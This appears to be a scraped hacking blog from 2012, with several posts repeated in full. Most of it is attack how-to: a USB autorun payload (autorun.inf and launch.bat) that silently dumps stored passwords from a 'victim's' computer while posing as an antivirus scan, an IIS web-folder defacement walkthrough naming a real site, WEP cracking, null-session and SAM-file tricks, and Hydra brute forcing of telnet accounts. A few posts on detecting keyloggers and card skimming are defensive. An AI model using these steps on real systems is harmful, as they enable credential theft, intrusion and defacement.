HOW TO TURN YOUR USB INTO HACKING USB
The article is written to tell people how to make their USB into a Hacking USB. Which you Just have to insert into a Persons Computer and all of the Stored Password in that computer will be stored into the USB.
THE THINGS YOU NEED:
1) A USB DRIVE at least 100mb
2) MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications: (DOWNLOAD HERE)
3) Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc (DOWNLAOD HERE)
4) Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. (DOWLOAD HERE)
5) IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.(DOWNLOAD HERE)
6) Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (DOWNLOAD HERE)
NOTE: TURN OFF THE ANTIVIRUS DURING DOWNLOAD.
HOW TO PREPARE USB:
Now You have downloaded all the files copy their setup into USB (e.g. mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe)
STEP 1) Now open a new notepad and Type following command as it is:
=======================================================
[autorun]
open=launch.bat
ACTION = ANTIVIRUS CHEAK
Now save this notepad as autorun.inf (remember to choose All files from save as type.)
STEP 2) Now Open a New Notepad and Copy following command as it is.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Now save this files as launch.bat (remember to choose All files from save as type)
STEP 3) Copy all the setups , autorun.inf , launch.bat to USB.
Now when you will insert the USB into the Computer of the Victim the Setup will Show that it is Scanning while it will steal all the Passwords from the Computer.
NOTE: Turn Off the Antivirus from the Victim’s Computer.
THE THINGS YOU NEED:
1) A USB DRIVE at least 100mb
2) MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications: (DOWNLOAD HERE)
3) Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc (DOWNLAOD HERE)
4) Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. (DOWLOAD HERE)
5) IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.(DOWNLOAD HERE)
6) Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox. (DOWNLOAD HERE)
NOTE: TURN OFF THE ANTIVIRUS DURING DOWNLOAD.
HOW TO PREPARE USB:
Now You have downloaded all the files copy their setup into USB (e.g. mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe)
STEP 1) Now open a new notepad and Type following command as it is:
=======================================================
[autorun]
open=launch.bat
ACTION = ANTIVIRUS CHEAK
Now save this notepad as autorun.inf (remember to choose All files from save as type.)
STEP 2) Now Open a New Notepad and Copy following command as it is.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Now save this files as launch.bat (remember to choose All files from save as type)
STEP 3) Copy all the setups , autorun.inf , launch.bat to USB.
Now when you will insert the USB into the Computer of the Victim the Setup will Show that it is Scanning while it will steal all the Passwords from the Computer.
NOTE: Turn Off the Antivirus from the Victim’s Computer.
HOW TO HACK WEBSITE WITH IIS EXPLOIT. [TUTORIAL]
In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest way to Hack any site.
STEP 1: Click on Start button and open "RUN".
STEP 2: Now Type this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".
STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".
STEP 5: Now Click on "Finish"
STEP 6: Now the folder will appear. You can open it and put any deface page or anything.
STEP 7: I put text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.
.
Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"In your case it will be " www.[sitename].com/[file name that you uploaded] "
Monday, December 24, 2012
Learn to Detect Hidden trojons Viruses/Keyloggers On Your PC
Are you beware that there is a hidden Trojan, Virus or Keylogger working on your PC and sending your logins to hackers?
If you are in that situations you don't need to worry anymore. In this post i will show you a security software called Process Revealer that can detect and kill hidden processes.
Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.
Sunday, December 2, 2012
Scammers steal credit card details in ways you never thought of
Cyber criminals and malicious scammers are constantly at work to devise new ways to steal confidential user data. Unfortunately, such attacks are not just restricted to the Internet. A recently discovered spate of attacks enables scammers to steal credit/debit card details and these methods are increasingly carried out in the physical world.
In brief, here are the 5 most common places from where credit/debit card data can be stolen:
- Restaurants and retail stores
- Online shopping portals
- Hacked email accounts
- ATM machines
- Thieves and pickpockets
Restaurants and retail stores
Some scammers have devised ways to tamper with the card readers at retail stores. Malicious smart cards that look like legitimate cards are created and then inserted into the machines to make a payment. However, the machine simply says than an error has occurred and the retail store merchant is unaware of the damage that has been done. When a genuine payment is made with a valid card over the same machine in the future, the details of that card get recorded. Now the scammer revisits the store after a day or two and inserts the fraudulent card into the machine to make another seemingly innocent payment. Details about all the cards that have been inserted in the interim period are now transferred into the malicious card which can be viewed by the scammer via another device.
Online shopping portals
The best online shopping portals mandatorily use secure methods to protect user details. Unsecure portals are susceptible to hackers and can easily lose data to scammers. There have been several instances where major online portals have been breached and card details have been stolen and misused. From a customers perspective it is advisable to be aware of the concept of SSL and security certificates. Additionally, the best Internet security software installed on a machine can also detect fraudulent pages and portals.
Hacked email accounts
Many people receive and pay their credit card bills via email. So if a hacker manages to gain access to an email account, he can cause a lot of trouble. It is imperative to use various tools for email protection like two-factor authentication, strong and unique passwords etc. Mail services like Gmail and Yahoo also offer other methods to check if your account has been hacked into, and these are worth exploring as well.
ATM Machines
Theft of card data from ATM machines is known as ‘skimming’. This is accomplished with the help of simple card reading equipment and a small camera that records an individual when he punches in his PIN. Scammers also use equipment that replicates the magnetic strip of cards. However, various steps can be taken to avoid such attacks and this includes shielding your hand while typing the PIN and being aware of suspicious looking machines.
Thieves and pickpockets
Physical loss of possession of cards is the biggest risk in this scenario. It is advisable to report a card loss to the concerned bank and local authorities as soon as possible. Another noteworthy precaution is to monitor card statements and activity for any signs of malicious activity.
Credit/debit card usage is convenient yet dangerous as scammers have come up with several innovative methods to gain such information. Readers are advised to stay vigilant and follow various safety measures to remain protected
Saturday, November 24, 2012
What is Keylogger & How to Find it in a Computer System
Are you aware of a software which works in the background of computer system?It also tracks every keystroke of the computer on which it is installed.
Keylogger is the software we are talking about. Let us throw some light on it for you to find it on your computer system.
There are two types of keylogger -
- Hardware keylogger – It is usually used in cyber cafes to hack the Id and Password of users
- Software keylogger - It is used on remote computers. It can provide all logs of texts entered on the installed computer.
Let’s look into their details
Hardware Keylogger :
Hardware keylogger is a device which you can simply plug into computer’s keyboard cable and can start tracking keystrokes instantly. It takes very less time (less then 5 seconds) to install, all you need is to simply plug in. It also doesn’t require to log into computer to install. It can be installed on any operating system and if the operating system crashes, the data inside keylogger will remain intact.
Software Keylogger :
Software keylogger is a software which can be installed only by logging into computer system using password and administration privileges. It can record all operating system events such as page size, keystrokes etc. The main drawback of this software is that it can be detected by antivirus software.
How to Find Keylogger in a Computer :
Essence lies in knowing if someone has secretly installed keylogger in your system. Here are a few steps to find the keylogger in a computer.
Step 1: Click ctrl+alt+del simultaneously and check the task list. If you are unsure about a running task, examine all the running tasks immediately.
Step 2: Check all the installed programs in your system through control panel.
Step 3: Run your antivirus program to detect keylogger in your system.
Step 4: Download keylogger scanner program from internet and scan your system.
Step 5: Type “msconfig” in run box and check all startup programs.
Step 6: On public computers, you need to check keyboard port attached with CPU to detect hardware keylogger.
Saturday, October 13, 2012
WEP Cracking(WIFI)!!
First of all i will tell those who don't know what actually WEP is?
WEP is abbreviation of Wired Equivalency Protocol, but in lay mans terms its a way for you to secure your wireless communication through a method of encryption, usually already built in a wireless device with several options in order to keep neighbours out.
Method for cracking a WEP Or in short terms Breaking Wifi Security:
Here is how it can be done:
1. Run Kismet to find your target network. Get the SSID and the channel.
2. Run Airodump and start capturing data.
3. With Aireplay, start replaying a packet on the target network. (You can find a ‘good packet’ by looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC).
4. Watch as Airodump goes crazy with new IVs. Thanks to Aireplay.
5. Stop Airodump when you have about 1,000 IVs.
6. Run Aircrack on the captured file.
7. You should see the WEP key infront of you now.
Cheers
List of programs used:
-Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
It is designed for Linux.
You can download it at KISMET
A windows version can be downloaded at Kismet Windows Version
-Aircrack (Includes Airodump, Aireplay, Aircrack and optional Airdecap for decrypting WEP/WPA capture files)
-Aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once enough encrypted packets have been captured with airodump.
-Airdecap is used to decrypt WEP/WPA capture files.
-Airmon can be used to configure the wireless card.
-Aireplay is used to inject frames.
-Airodump is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (initialization vectors) for the intent of using them with aircrack-ng.
Download the whole suit at:
Dowload Whole Suit
WEP is abbreviation of Wired Equivalency Protocol, but in lay mans terms its a way for you to secure your wireless communication through a method of encryption, usually already built in a wireless device with several options in order to keep neighbours out.
Method for cracking a WEP Or in short terms Breaking Wifi Security:
Here is how it can be done:
1. Run Kismet to find your target network. Get the SSID and the channel.
2. Run Airodump and start capturing data.
3. With Aireplay, start replaying a packet on the target network. (You can find a ‘good packet’ by looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC).
4. Watch as Airodump goes crazy with new IVs. Thanks to Aireplay.
5. Stop Airodump when you have about 1,000 IVs.
6. Run Aircrack on the captured file.
7. You should see the WEP key infront of you now.
Cheers
List of programs used:
-Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
It is designed for Linux.
You can download it at KISMET
A windows version can be downloaded at Kismet Windows Version
-Aircrack (Includes Airodump, Aireplay, Aircrack and optional Airdecap for decrypting WEP/WPA capture files)
-Aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once enough encrypted packets have been captured with airodump.
-Airdecap is used to decrypt WEP/WPA capture files.
-Airmon can be used to configure the wireless card.
-Aireplay is used to inject frames.
-Airodump is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (initialization vectors) for the intent of using them with aircrack-ng.
Download the whole suit at:
Dowload Whole Suit
Thursday, August 16, 2012
MAC ADDRESS SPOOFING
 |
(NIC) or network adapter in this world, is given a unique MAC address or Media Access Control Address. This number is given by the manufacturer and identification purpose.
Usually MAC address is written as 12 digit hexa decimal number. For example 00-45-32-K5-D7-23.
If you computer has an Ethernet network adapter or a wireless network adapter, then each of them will have two different MAC address.
On windows computer if you want to find out the MAC address of your network adapter then open command prompt and type ipconfig /all
MAC ADDRESS SPOOFING
MAC address spoofing is a art of changing your MAC address. You can easily change your MAC address with the following steps.
- Download one of my favorite command line tool called Ether Change(Download)
- Go to command prompt and type ipconfig /all for checking your current MAC address.
- Run etherchange tool from command line to change your mac address.
- Select the network adopter with their assigned number and write new12 digit hexa decimal MAC address without any space, Press enter. Your MAC address is now changed.
Tuesday, August 7, 2012
Wednesday, April 25, 2012
Advanced Novell Hacking
This short section will discuss various advanced Novell hacking techniques. These involve using
programs such as port scanners, keyloggers, trojans and password crackers. I will also be looking
at File and Print Sharing (Legion V2.1, Sid2User - User2Sid, DumpSec), as well as some tips and
tricks with navigating around the network, including the "net use" command.
Firstly, let's look at various methods of hacking the network using specific programs. Although
this section may offend some people, it is nevertheless an essential part of Novell security. It
is an unfortunate fact that many people these days want to hack someone to be "cool" in the eyes
of their friends. These people have little or no morals, and almost always possess absolutely no
skill what so ever. All they care about is getting what they want, and they don't care how they
get it. Because of their lack of skill, these people usually rely solely on programs to do their
dirty work (if they don't have a friend who does it for them). If anybody like this is reading
this, I spit on you.
On the other hand, there are many skilled hackers out there who also turn to programs which
automate the process for a variety of reasons, usually because it is easier and usually more
effective to use programs.
As with any hack, there is one tool that you simply cannot live without. A port scanner. There
has been much debate over which port scanner is the best, what the pro's and con's of each
scanner are etc. Many say Nmap, but I often there's no need to waste time with such an advanced
scanner. The problem with Nmap is that it is too complicated for quick and easy use. Nmap is
good for home use, when you have a lot of time on your hands to try out various scans. In my
humble opinion, the best scanner for a Novell network is Angry IP Scanner by Angryziber
(angryziber@angryziber.com). Angry IP allows for lightning fast port scans on huge networks,
with great accuracy. It has some built in features like being able to establish connections over
HTTP, FTP and Telnet, as well as being able to Traceroute. It also has cool things like
"favourites" and being able to tell you many things about the target, such as Hostname, Comp.
Name, Group Name, User Name, MAC address and TTL. On top of all this, it can be used from the
command line! Anyway, it has many more features that you need to explore yourself. For now, all
we really need to be focussing on is its efficient simple port scanning features.
First of all, you will need to get the IP of some computers on your network. If you have been
reading this tutorial carefully instead of just skip to this section, you will remember that this
can be done using the netstat command in DOS (btw, if you still can't get DOS then you are really
dumb - no offence). You really only need one IP, because most, if not all of the IP's on the
network will have the same Network Number and Host Number. So, if you can see that your IP is
123.123.12.123, you should only scan IP's that have the same Network Number and Host Number. In
the case of the example, you would enter the start IP as 123.123.12.1 and the end IP as
123.123.12.255. First you should scan using only one port because you want to know exactly how
many computers you are potentially dealing with. If you put too many ports, you will be waiting
ages for your results if there are heaps of computers on the network. An alternative to this
would be to use the "net view" command.
C:\>net view
This displays all the computers connected to the network that you are currently on. This command
can be used to get further information about an individual machine by typing:
C:\>net view \\SOMECOMPUTER
==============================
Disk | share name
C:\>net view \\workgroup:TARGETWG (gives all computers in workgroup)
C:\>net view \\domain:TARGETD (gives all computers in domain)
Anyway, it would be best to specify the port as TCP 139, which you should all know as NetBIOS.
If this is open on any computers (and it damn well should be, you are on a network), you may be
able to get access to that computers hard drive. Go into DOS, and type in:
C:\>net use \\ADMINCOMPUTER\IPC$ "" /u:""
If you have even the slightest experience in hacking, you would have seen this command a
thousand times before. For those haven't, all you are doing is attempting to connect to computer
"ADMINCOMPUTER" using the inbuilt IPC$ share with a null password "" and an anonymous user
/u:"". If this doesn't work, you can try substituting the password for a wilcard * or even the
account, so you can have:
C:\>NET USE \\ADMINCOMPUTER\IPC$ "" /u:""
C:\>NET USE \\ADMINCOMPUTER\IPC$ * /USER:""
C:\>NET USE \\ADMINCOMPUTER\IPC$ * /USER:
They all do the same thing, but sometimes only certain ones will work on certain machines. If
you are unlucky, you could try to substitute the IPC$ for ADMIN$ or C$. These are just
additional default shares. The difference between ADMIN$, C$ and IPC$ is that IPC$ cannot be
removed. This means that you should always be able to establish a connection. Of course, the
admin may want to create additional shares such as such as A$ (remote floppy drive), E$ (remote
CD drive) and really anything he wants. An admin can quite easily create and delete shares using
the "net share" command:
C:\>net share ADMIN$ /delete
Command completed successfully
This command deletes the remote administrator ADMIN$ share. Shares can be added by typing:
C:\>net share A$ a:
Command completed successfully.
This tells the computer to create a share A$ with the target to the a: drive.
I said earlier that it is possible to disconnect the a: drive from the network, thus enabling it
for our own usage. This can be done using the command:
C:\>net use a: /delete
Unfortunately, this command can be restricted by the administrator. Once it is, no command with
the prefix "net" will work. On the bright side, it is rare for an admin to realise that anybody
has been ******* with net use commands and establishing connections, yet alone disable the
command. If the command does get disabled, we are forced to turn to programs to do our dirty
work.
Although there are a number of Netbios scanners, most of them are rather dated as these days few
hackers seriously rely on Netbios as their main weapon. Sure, it can be fun and rewarding, but
most computers these days have patches to guard against unauthorised access, or simply block
access to TCP 139 through their firewall or router. As a result, most people have stopped making
new Netbios programs. Because of this, most of the programs for Netbios are old. REALLY old.
We're talking old as in 1999 old. Sure, doesn't seem like that long ago, but in the computer
world, that is an eternity. Luckily for us, this is slightly different for networks. Because a
network has to be tied together very closely, it usually depends on port 139 to handle all the
traffic. As a result, most old programs will work like a charm. Although there are many, many
different programs you can use to try and get the shares, I recommend you use Legion V2.1 from
the now dead Rhino9 Security Group. It generally floats among internet sites.
Now let's take a quick look at the Security Accounts Manager (SAM). SAM is a way of storing
users details on the computer. It has usernames and password hashes inside, so it is very
important to keep safe from prying eyes. If you're the one with those eyes, SAM may just be your
goal. To cut the long story short, SAM cannot be accessed while anyone is logged onto that
computer. So what you have to do is restart it in DOS and try and copy it from there onto
floppy. The only problem with this is that sometimes SAM can be very big - a couple of Mb even
so floppy disk is an unlikely alternative. If the computer doesn't have a burner then it is
unlikely that you will be able to extract the hashes, so try and make the best of it any way you
can. Sometimes it's even possible to rename the SAM file by restarting in DOS and typing:
ren C:\winnt\repair\sam wateva
This will make the SAM file unreadable, so if the passwords are stored on the computer rather
than the server, they will all be useless. If this works, you will be able to log on without a
username or password. If you are able to extract the SAM file, there are many different password
crackers that you can use to take a peek at what's insisde. L0pht, Cain and Abel and many more
do a splendid job. Try them out and see what works for you.
Finally, I'll just show you one last thing that will freak the hell out of your admin if he ever
sees it. It is ridiculously easy to access the server on most networks and nobody even considers
this method. Simply create a shortcut to it!!! If you can find a way to find the hostname of
your server, all you have to do it right click, select new then click on shortcut. In the space
provided, type the hostname of the server. For example, if the server is called "server-1" then
in the shotcut type:
\\server-1
Then click next and that's it! You can double click on the shortcut and you will have access to
all the files on the server!!! As I said before, this will scare the hell out of any admin
because he wouldn't have thought of it himself and has definately not seen this before.
As for how much you can actually do - that depends entirely on the server. Most times
you will just browse but sometimes, who knows?
Lastly, we will take a quick look at the the SUBST command. The SUBST command associates
a path with a drive letter. This means it creates a virtual drive on top of an actual one. This can
be extremely handy when the administrator has blocked of say the C: drive from being viewed.
Often the admin simply restricts access to the C: drive by not showing the icon for the drive. If this
is the case simple open up a command prompt and type:
explorer c:
This will open explorer to the C: drive. Generally one will not be so lucky. The C: drive itself is
often restricted and trying to open explorer through command will tell us we don't have permission.
SUBST allows us to get passed this. Open up a command prompt and type in:
subst z: C:\
where z: is the virtual drive you wish to create and C:\ is the path of the drive you wish to view.
Now all you have to do is type...
explorer z:
...and an explorer window will pop up showing you the contents of C: but in the z: drive. You may
navigate this at will just as you would normally on an unrestricted computer. Although
useful, SUBST really only gives you a graphic interface since we may the entire contents of a
drive through command.
***Note: SUBST will also add the virtual drive to My Computer. If you have access to My Computer
you will see z: as well.
If you are having trouble with command because you cannot scroll up
whilst trying to use dir, try using dir /w or /p instead. Otherwise...
dir >> H:\dir.txt
...will send the results of the dir to a file called dir.txt (or will create the file if it does not already
exist) on the H: drive. Also note that on large networks net view can also be a pain, but using
net view >> H:\net.txt
we can see all the computers in a text file!
programs such as port scanners, keyloggers, trojans and password crackers. I will also be looking
at File and Print Sharing (Legion V2.1, Sid2User - User2Sid, DumpSec), as well as some tips and
tricks with navigating around the network, including the "net use" command.
Firstly, let's look at various methods of hacking the network using specific programs. Although
this section may offend some people, it is nevertheless an essential part of Novell security. It
is an unfortunate fact that many people these days want to hack someone to be "cool" in the eyes
of their friends. These people have little or no morals, and almost always possess absolutely no
skill what so ever. All they care about is getting what they want, and they don't care how they
get it. Because of their lack of skill, these people usually rely solely on programs to do their
dirty work (if they don't have a friend who does it for them). If anybody like this is reading
this, I spit on you.
On the other hand, there are many skilled hackers out there who also turn to programs which
automate the process for a variety of reasons, usually because it is easier and usually more
effective to use programs.
As with any hack, there is one tool that you simply cannot live without. A port scanner. There
has been much debate over which port scanner is the best, what the pro's and con's of each
scanner are etc. Many say Nmap, but I often there's no need to waste time with such an advanced
scanner. The problem with Nmap is that it is too complicated for quick and easy use. Nmap is
good for home use, when you have a lot of time on your hands to try out various scans. In my
humble opinion, the best scanner for a Novell network is Angry IP Scanner by Angryziber
(angryziber@angryziber.com). Angry IP allows for lightning fast port scans on huge networks,
with great accuracy. It has some built in features like being able to establish connections over
HTTP, FTP and Telnet, as well as being able to Traceroute. It also has cool things like
"favourites" and being able to tell you many things about the target, such as Hostname, Comp.
Name, Group Name, User Name, MAC address and TTL. On top of all this, it can be used from the
command line! Anyway, it has many more features that you need to explore yourself. For now, all
we really need to be focussing on is its efficient simple port scanning features.
First of all, you will need to get the IP of some computers on your network. If you have been
reading this tutorial carefully instead of just skip to this section, you will remember that this
can be done using the netstat command in DOS (btw, if you still can't get DOS then you are really
dumb - no offence). You really only need one IP, because most, if not all of the IP's on the
network will have the same Network Number and Host Number. So, if you can see that your IP is
123.123.12.123, you should only scan IP's that have the same Network Number and Host Number. In
the case of the example, you would enter the start IP as 123.123.12.1 and the end IP as
123.123.12.255. First you should scan using only one port because you want to know exactly how
many computers you are potentially dealing with. If you put too many ports, you will be waiting
ages for your results if there are heaps of computers on the network. An alternative to this
would be to use the "net view" command.
C:\>net view
This displays all the computers connected to the network that you are currently on. This command
can be used to get further information about an individual machine by typing:
C:\>net view \\SOMECOMPUTER
==============================
Disk | share name
C:\>net view \\workgroup:TARGETWG (gives all computers in workgroup)
C:\>net view \\domain:TARGETD (gives all computers in domain)
Anyway, it would be best to specify the port as TCP 139, which you should all know as NetBIOS.
If this is open on any computers (and it damn well should be, you are on a network), you may be
able to get access to that computers hard drive. Go into DOS, and type in:
C:\>net use \\ADMINCOMPUTER\IPC$ "" /u:""
If you have even the slightest experience in hacking, you would have seen this command a
thousand times before. For those haven't, all you are doing is attempting to connect to computer
"ADMINCOMPUTER" using the inbuilt IPC$ share with a null password "" and an anonymous user
/u:"". If this doesn't work, you can try substituting the password for a wilcard * or even the
account, so you can have:
C:\>NET USE \\ADMINCOMPUTER\IPC$ "" /u:""
C:\>NET USE \\ADMINCOMPUTER\IPC$ * /USER:""
C:\>NET USE \\ADMINCOMPUTER\IPC$ * /USER:
They all do the same thing, but sometimes only certain ones will work on certain machines. If
you are unlucky, you could try to substitute the IPC$ for ADMIN$ or C$. These are just
additional default shares. The difference between ADMIN$, C$ and IPC$ is that IPC$ cannot be
removed. This means that you should always be able to establish a connection. Of course, the
admin may want to create additional shares such as such as A$ (remote floppy drive), E$ (remote
CD drive) and really anything he wants. An admin can quite easily create and delete shares using
the "net share" command:
C:\>net share ADMIN$ /delete
Command completed successfully
This command deletes the remote administrator ADMIN$ share. Shares can be added by typing:
C:\>net share A$ a:
Command completed successfully.
This tells the computer to create a share A$ with the target to the a: drive.
I said earlier that it is possible to disconnect the a: drive from the network, thus enabling it
for our own usage. This can be done using the command:
C:\>net use a: /delete
Unfortunately, this command can be restricted by the administrator. Once it is, no command with
the prefix "net" will work. On the bright side, it is rare for an admin to realise that anybody
has been ******* with net use commands and establishing connections, yet alone disable the
command. If the command does get disabled, we are forced to turn to programs to do our dirty
work.
Although there are a number of Netbios scanners, most of them are rather dated as these days few
hackers seriously rely on Netbios as their main weapon. Sure, it can be fun and rewarding, but
most computers these days have patches to guard against unauthorised access, or simply block
access to TCP 139 through their firewall or router. As a result, most people have stopped making
new Netbios programs. Because of this, most of the programs for Netbios are old. REALLY old.
We're talking old as in 1999 old. Sure, doesn't seem like that long ago, but in the computer
world, that is an eternity. Luckily for us, this is slightly different for networks. Because a
network has to be tied together very closely, it usually depends on port 139 to handle all the
traffic. As a result, most old programs will work like a charm. Although there are many, many
different programs you can use to try and get the shares, I recommend you use Legion V2.1 from
the now dead Rhino9 Security Group. It generally floats among internet sites.
Now let's take a quick look at the Security Accounts Manager (SAM). SAM is a way of storing
users details on the computer. It has usernames and password hashes inside, so it is very
important to keep safe from prying eyes. If you're the one with those eyes, SAM may just be your
goal. To cut the long story short, SAM cannot be accessed while anyone is logged onto that
computer. So what you have to do is restart it in DOS and try and copy it from there onto
floppy. The only problem with this is that sometimes SAM can be very big - a couple of Mb even
so floppy disk is an unlikely alternative. If the computer doesn't have a burner then it is
unlikely that you will be able to extract the hashes, so try and make the best of it any way you
can. Sometimes it's even possible to rename the SAM file by restarting in DOS and typing:
ren C:\winnt\repair\sam wateva
This will make the SAM file unreadable, so if the passwords are stored on the computer rather
than the server, they will all be useless. If this works, you will be able to log on without a
username or password. If you are able to extract the SAM file, there are many different password
crackers that you can use to take a peek at what's insisde. L0pht, Cain and Abel and many more
do a splendid job. Try them out and see what works for you.
Finally, I'll just show you one last thing that will freak the hell out of your admin if he ever
sees it. It is ridiculously easy to access the server on most networks and nobody even considers
this method. Simply create a shortcut to it!!! If you can find a way to find the hostname of
your server, all you have to do it right click, select new then click on shortcut. In the space
provided, type the hostname of the server. For example, if the server is called "server-1" then
in the shotcut type:
\\server-1
Then click next and that's it! You can double click on the shortcut and you will have access to
all the files on the server!!! As I said before, this will scare the hell out of any admin
because he wouldn't have thought of it himself and has definately not seen this before.
As for how much you can actually do - that depends entirely on the server. Most times
you will just browse but sometimes, who knows?
Lastly, we will take a quick look at the the SUBST command. The SUBST command associates
a path with a drive letter. This means it creates a virtual drive on top of an actual one. This can
be extremely handy when the administrator has blocked of say the C: drive from being viewed.
Often the admin simply restricts access to the C: drive by not showing the icon for the drive. If this
is the case simple open up a command prompt and type:
explorer c:
This will open explorer to the C: drive. Generally one will not be so lucky. The C: drive itself is
often restricted and trying to open explorer through command will tell us we don't have permission.
SUBST allows us to get passed this. Open up a command prompt and type in:
subst z: C:\
where z: is the virtual drive you wish to create and C:\ is the path of the drive you wish to view.
Now all you have to do is type...
explorer z:
...and an explorer window will pop up showing you the contents of C: but in the z: drive. You may
navigate this at will just as you would normally on an unrestricted computer. Although
useful, SUBST really only gives you a graphic interface since we may the entire contents of a
drive through command.
***Note: SUBST will also add the virtual drive to My Computer. If you have access to My Computer
you will see z: as well.
If you are having trouble with command because you cannot scroll up
whilst trying to use dir, try using dir /w or /p instead. Otherwise...
dir >> H:\dir.txt
...will send the results of the dir to a file called dir.txt (or will create the file if it does not already
exist) on the H: drive. Also note that on large networks net view can also be a pain, but using
net view >> H:\net.txt
we can see all the computers in a text file!
Friday, February 17, 2012
Basics of cracking FTP and Telnet accounts
Most of us crave for direct download links so that we can download at the highest possible speed. More intelligent of us
sniff out forums and DDL / WAREZ sites for direct links and to get unethical stuff. But as the saying goes,”Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime”, after a flurry of emails about on how to crack ftp/pop3/telnet accounts,I decided to post an article on the above stated topic. One of the easy of hacking is brute forcing.You can quickly hack accounts if you have a decent sized password dictionary. I personally use one of about 3.16GB in size, but for this tutorial I'm only going to use a small password list, just so you get the feel of it.
Here is how to do that
The First step is to download hydra either from it's homepage (www.thc.org/thc-hydra/). Choose the windows version and hit download.Download the zip file, extract it, and make sure you see the files below:
If you do, that's good. Go to Start > Run > cmd to open the command prompt. Then change to your hydra folder using the “cd” command. For example my hydra folder was on the desktop, so I did this:
Now that you've done this, it's time to execute Hydra for the first time! Sorry Windows fans, but there is only a GUI for Hydra for Linux systems, you you're gonna have to do it the old fashioned way. Just type “hydra.exe” without quotes, and watch the result:
Now we have to find some IP’s to attack and we will do it by ip scanning using Nmap. You can download it fromhere – make sure to download the windows installer.after installing it,find out your IP address, so that you know a possible IP range. In the command prompt sessions, type “ipconfig” and watch the results
In my case, the range is at least 10.1.1.1-4, but I'll go from 1 to 10 just to be safe. Fire up Nmap and do a ping scan “nmap -sP 10.1.1.1-10” to see what hosts are alive, and wait for the results
:
Pick a host to port scan – I picked 10.1.1.1 because it is a router, and for most people the password is generally pretty simple, if not default. Port scan it using something like “nmap -sS -sV -P 0 -T5 -O 10.1.1.1” and see if it's running any services (click on the “Ports/Hosts” tab at the end for a simpler view of the services running and their ports). If you dont understand on how to use NMAP,read the basics here
Now we will be attacking the Telnet port because I know that it works, because I know you guys think Telnet is the be-all and end-all of hacking, and because the Windows version of THC-Hydra isn't compiled with LIBSSH support (unless you did it yourself), and as such I can't attack SSH – otherwise I'd be doing that instead. It's so much better. Head back to your command session, and review the output from Hydra before; it tells you the services it can crack. After looking through it, and realising that Telnet definitely is there, we can now proceed to attack it with the command
An explanation of the command: -l admin was used because I assumed that the router would have the login of “admin”. You can use username lists as well if you wish. -P passlist.txt specified a password dictionary named “passlist.txt” - make sure to have the -P include the capital P, otherwise you'll be specifying a password to try.
10.1.1.1 is the routers IP address, and telnet is the protocol we want to attack. Now obviously we could tell it to attack that protocol on a different port, but we won't bother with that right now unless anyone else wants to see how. My dictionary only included 4 words for the purpose of this tutorial. You can see the cracked password circled at the end (which by the way, isn't my password for the router, for those of you who know how to get my IP and wanna try and break in :P). And that's how to do a basic hydra service crack on Windows.
sniff out forums and DDL / WAREZ sites for direct links and to get unethical stuff. But as the saying goes,”Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime”, after a flurry of emails about on how to crack ftp/pop3/telnet accounts,I decided to post an article on the above stated topic. One of the easy of hacking is brute forcing.You can quickly hack accounts if you have a decent sized password dictionary. I personally use one of about 3.16GB in size, but for this tutorial I'm only going to use a small password list, just so you get the feel of it.Here is how to do that
The First step is to download hydra either from it's homepage (www.thc.org/thc-hydra/). Choose the windows version and hit download.Download the zip file, extract it, and make sure you see the files below:
If you do, that's good. Go to Start > Run > cmd to open the command prompt. Then change to your hydra folder using the “cd” command. For example my hydra folder was on the desktop, so I did this:
Now that you've done this, it's time to execute Hydra for the first time! Sorry Windows fans, but there is only a GUI for Hydra for Linux systems, you you're gonna have to do it the old fashioned way. Just type “hydra.exe” without quotes, and watch the result:
Now we have to find some IP’s to attack and we will do it by ip scanning using Nmap. You can download it fromhere – make sure to download the windows installer.after installing it,find out your IP address, so that you know a possible IP range. In the command prompt sessions, type “ipconfig” and watch the results
